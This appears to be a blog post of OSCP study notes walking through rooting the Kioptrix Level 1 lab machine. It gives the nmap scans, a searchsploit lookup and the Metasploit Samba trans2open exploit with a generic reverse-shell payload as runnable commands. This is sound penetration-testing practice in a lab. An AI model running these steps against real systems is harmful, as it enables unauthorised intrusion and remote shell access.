OSCP Learning Notes -Exploit(1)

Gaining Root with Metasploit

Platform: Kali Linux, Kioptrix Level 1

1. Find the IP of Kioptirx

nmap 10.0.0.0/24 -n -sP -sn

OSCP Learning Notes -Exploit(1)

2. Scan the Kioptrix server and analyst the result.

nmap -nvv -Pn- -sSV -p 22,80,111,139,443,1024 --version-intensity 9 -A -oN /root/kioptrix1_detailed.txt 10.0.0.20

OSCP Learning Notes -Exploit(1)

3. Search samba exploit methods.

searchsploit samba 2.2

OSCP Learning Notes -Exploit(1)

4. Open Metasploit.

msfconsole

OSCP Learning Notes -Exploit(1)

5. Search and use the suitable module.

use exploit/linux/samba/trans2open

OSCP Learning Notes -Exploit(1)

6. Set the metasploit options.

set rhost 10.0.0.20

 

OSCP Learning Notes -Exploit(1)

7. Start the exploit but failed in the end.

exploit

 

OSCP Learning Notes -Exploit(1)

8. Set the payload and Try gain.

set payload generic/shell_reverse_tcp

 

OSCP Learning Notes -Exploit(1)

 Root the target server.

OSCP Learning Notes -Exploit(1)

 

上一篇:OSCP Learning Notes - WebApp Exploitation(4)


下一篇:在Notes应用开发中使用Web Service入门